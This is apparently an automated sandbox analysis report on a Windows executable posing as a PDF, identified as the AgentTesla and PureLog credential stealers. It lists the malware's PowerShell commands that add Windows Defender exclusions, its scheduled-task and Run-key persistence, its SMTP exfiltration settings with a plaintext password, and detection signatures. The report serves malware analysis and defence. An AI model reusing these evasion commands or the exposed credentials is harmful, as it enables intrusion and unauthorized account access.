Windows Analysis Report
SOA FOR APR 2024 PDF.exe

Overview

General Information

Sample name: SOA FOR APR 2024 PDF.exe
Analysis ID: 1432007
MD5: 7a6e9d01d9162c7537ba8091187e4235
SHA1: f5b69f4b0ec8cd0a4b7bab26a0de167c8cc535cd
SHA256: 7fd14673f73717b024728ae4248be0a1579f480a261c4f4d94742f230a01cb47
Tags: exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SOA FOR APR 2024 PDF.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • powershell.exe (PID: 4296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3992 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7200 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SOA FOR APR 2024 PDF.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • eeBIYZL.exe (PID: 7512 cmdline: C:\Users\user\AppData\Roaming\eeBIYZL.exe MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • schtasks.exe (PID: 7736 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eeBIYZL.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Roaming\eeBIYZL.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • BjTxJte.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • schtasks.exe (PID: 8132 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • BjTxJte.exe (PID: 7176 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • BjTxJte.exe (PID: 7240 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • schtasks.exe (PID: 7568 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}
Source | Rule | Description | Author | Strings
00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.2071533656.0000000003B69000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings
0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (strings listed below)
  • 0x31cfe:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31d70:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31dfa:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31e8c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31ef6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31f68:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31ffe:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3208e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                    System Summary

                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ProcessId: 4296, ProcessName: powershell.exe
                    Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ProcessId: 7384, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BjTxJte
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\eeBIYZL.exe, ParentImage: C:\Users\user\AppData\Roaming\eeBIYZL.exe, ParentProcessId: 7512, ParentProcessName: eeBIYZL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp", ProcessId: 7736, ProcessName: schtasks.exe
                    Source: Network Connection, Author: frack113: Data: DestinationIp: 50.87.195.61, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, Initiated: true, ProcessId: 7384, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49711
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", ProcessId: 7200, ProcessName: schtasks.exe
                    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ProcessId: 4296, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", ProcessId: 7200, ProcessName: schtasks.exe
                    No Snort rule has matched

                    AV Detection

                    Source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, ReversingLabs: Detection: 44%
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Virustotal: Detection: 52%
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe, ReversingLabs: Detection: 44%
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe, Virustotal: Detection: 52%
                    Source: SOA FOR APR 2024 PDF.exe, ReversingLabs: Detection: 44%
                    Source: SOA FOR APR 2024 PDF.exe, Virustotal: Detection: 52%
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe, Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Joe Sandbox ML: detected
                    Source: SOA FOR APR 2024 PDF.exe, Joe Sandbox ML: detected
                    Source: SOA FOR APR 2024 PDF.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49723 version: TLS 1.2
                    Source: SOA FOR APR 2024 PDF.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, Code function: 4x nop then jmp 0D3B12B4h, 0_2_0D3B0CC4
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe, Code function: 4x nop then jmp 08720CACh, 10_2_087206BC
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Code function: 4x nop then jmp 0D8B0CACh, 15_2_0D8B06BC
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Code function: 4x nop then jmp 0D1A0CACh, 21_2_0D1A06BC
                    Source: global traffic, TCP traffic: 192.168.2.5:49711 -> 50.87.195.61:587
                    Source: Joe Sandbox View, IP Address: 104.26.12.205
                    Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
                    Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown, DNS query: name: api.ipify.org
                    Source: global traffic, HTTP traffic detected:
                        GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
                    Source: global traffic, DNS traffic detected: DNS query: mail.fascia-arch.com
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: http://mail.fascia-arch.com
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: http://r3.i.lencr.org/0
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: http://r3.o.lencr.org0
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: http://x1.c.lencr.org/0
                    Source: eeBIYZL.exe (process memory), String found in binary or memory: http://x1.c6
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: http://x1.i.lencr.org/0
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: https://account.dyn.com/
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: https://api.ipify.org
                    Source: SOA FOR APR 2024 PDF.exe, eeBIYZL.exe, BjTxJte.exe (process memory), String found in binary or memory: https://api.ipify.org/
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49723 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, 8WWn.cs .Net Code: UOFvW
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, 8WWn.cs .Net Code: UOFvW
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\eeBIYZL.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window created: window name: CLIPBRDWNDCLASS

                    System Summary

                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4bec170.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4c27190.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.45fc310.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.4637330.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fae400.2.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4bec170.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.BjTxJte.exe.4c27190.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.4637330.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.eeBIYZL.exe.3fae400.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: SOA FOR APR 2024 PDF.exe Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
                    Source: eeBIYZL.exe.0.dr Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2075783842.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2070082705.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2077429263.0000000009CB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2070759087.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2075783842.0000000006C0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHYv.exe" vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.0000000004557000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3274870194.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe Binary or memory string: OriginalFilenameHYv.exe" vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4bec170.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4c27190.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
